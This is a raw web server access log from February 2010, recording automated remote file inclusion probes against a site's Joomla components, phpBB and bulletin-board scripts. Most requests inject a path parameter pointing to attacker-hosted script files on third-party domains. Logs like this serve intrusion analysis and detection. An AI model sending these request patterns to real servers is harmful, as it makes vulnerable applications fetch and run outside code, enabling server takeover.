200.93.147.154 - - [08/Feb/2010:09:10:45 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:09:12:27 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:09:12:30 -0800] "GET /logs/access_100202.log/?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:09:12:31 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.173 - - [08/Feb/2010:09:13:08 -0800] "GET / HTTP/1.0" 200 2376 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.pixero.net"
200.93.147.154 - - [08/Feb/2010:09:13:24 -0800] "GET /logs/access_100131.log/?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:09:14:11 -0800] "GET /logs/access_100202.log//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:09:16:11 -0800] "GET /write_comment_update.php/?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:09:16:11 -0800] "GET /logs/access_100202.log//write_comment_update.php/?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:09:16:12 -0800] "GET /logs//write_comment_update.php/?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:09:16:15 -0800] "GET /logs/access_100130.log//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:09:17:16 -0800] "GET /logs/access_100201.log//write_comment_update.php/?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:09:19:58 -0800] "GET /logs/access_100202.log/?config[root_dir]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:09:19:58 -0800] "GET /logs/?config[root_dir]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 200 4942 "-" "libwww-perl/5.803" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:09:19:59 -0800] "GET /?config[root_dir]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 200 3642 "-" "libwww-perl/5.803" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:09:20:00 -0800] "GET /logs/access_100131.log/?config[root_dir]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:09:20:56 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://eroadsky.com/new/autoalbum/Links/image3.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:09:20:56 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://eroadsky.com/new/autoalbum/Links/image3.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:09:20:56 -0800] "GET /logs/access_100120.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://eroadsky.com/new/autoalbum/Links/image3.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:22:04 -0800] "GET //bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:22:04 -0800] "GET /logs///bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:22:04 -0800] "GET /logs/access_100120.log%20%20///bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:22:07 -0800] "GET //bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:22:07 -0800] "GET /logs/access_100120.log%20%20///bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:22:07 -0800] "GET /logs///bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:22:30 -0800] "GET /logs/access_100131.log%20%20///bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:22:32 -0800] "GET /logs/access_100131.log//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:22:32 -0800] "GET /logs//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:22:32 -0800] "GET /write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:22:47 -0800] "GET /logs/access_100131.log%20%20///bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:09:23:14 -0800] "GET /logs/access_100202.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:09:23:14 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:09:23:15 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:09:23:29 -0800] "GET /logs/access_100131.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [08/Feb/2010:09:24:23 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [08/Feb/2010:09:24:23 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [08/Feb/2010:09:24:23 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:09:24:24 -0800] "GET /logs/access_100202.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:09:24:24 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:09:24:25 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:09:24:40 -0800] "GET /logs/access_100131.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.36.173.93 - - [08/Feb/2010:09:25:16 -0800] "GET /logs/access_100201.log//includes/mx_functions_ch.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [08/Feb/2010:09:25:17 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [08/Feb/2010:09:25:17 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [08/Feb/2010:09:25:17 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [08/Feb/2010:09:25:58 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [08/Feb/2010:09:25:58 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [08/Feb/2010:09:25:58 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [08/Feb/2010:09:26:14 -0800] "GET /logs/access_100110.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.36.173.93 - - [08/Feb/2010:09:26:17 -0800] "GET /logs/access_100112.log//includes/mx_functions_ch.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [08/Feb/2010:09:26:52 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [08/Feb/2010:09:26:52 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [08/Feb/2010:09:26:52 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [08/Feb/2010:09:27:23 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [08/Feb/2010:09:27:23 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [08/Feb/2010:09:27:23 -0800] "GET /logs/access_100110.log%20%20/ncaster/admin/addons/archive/archive.php?adminfolder=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [08/Feb/2010:09:27:42 -0800] "GET /logs/access_100110.log%20%20/ncaster/admin/addons/archive/archive.php?adminfolder=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [08/Feb/2010:09:27:42 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [08/Feb/2010:09:27:42 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:09:27:48 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:09:27:48 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:09:27:48 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:09:27:48 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:09:27:48 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:09:27:49 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [08/Feb/2010:09:27:56 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [08/Feb/2010:09:27:56 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [08/Feb/2010:09:27:56 -0800] "GET /logs/access_100110.log%20%20/ncaster/admin/addons/archive/archive.php?adminfolder=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:09:28:39 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:09:28:39 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:09:28:41 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [08/Feb/2010:09:28:42 -0800] "GET /logs/access_100110.log%20%20/ncaster/admin/addons/archive/archive.php?adminfolder=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [08/Feb/2010:09:28:42 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [08/Feb/2010:09:28:42 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [08/Feb/2010:09:28:45 -0800] "GET /logs/access_100110.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:09:28:48 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:09:28:48 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:09:28:48 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:09:28:53 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:09:28:53 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:09:28:53 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:09:29:27 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:09:29:27 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:09:29:28 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [08/Feb/2010:09:30:16 -0800] "GET /logs/access_100110.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:09:30:31 -0800] "GET /logs/access_100110.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:09:32:19 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:09:32:19 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:09:32:19 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:09:32:23 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:09:32:23 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:09:32:24 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.190.243.10 - - [08/Feb/2010:09:32:26 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.190.243.10 - - [08/Feb/2010:09:32:26 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.190.243.10 - - [08/Feb/2010:09:32:26 -0800] "GET /logs/access_100201.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:09:32:35 -0800] "GET /admin/admin_news_bot.php?root_path=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:09:32:35 -0800] "GET /logs//admin/admin_news_bot.php?root_path=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:09:32:35 -0800] "GET /logs/access_100103.log%20%20//admin/admin_news_bot.php?root_path=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:09:32:38 -0800] "GET /admin/admin_news_bot.php?root_path=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:09:32:38 -0800] "GET /logs//admin/admin_news_bot.php?root_path=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:09:32:38 -0800] "GET /logs/access_100103.log%20%20//admin/admin_news_bot.php?root_path=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [08/Feb/2010:09:32:45 -0800] "GET /logs/access_100103.log/////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [08/Feb/2010:09:32:45 -0800] "GET ////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [08/Feb/2010:09:32:45 -0800] "GET /logs/////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:09:32:47 -0800] "GET /logs/access_100110.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:09:32:48 -0800] "GET /write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
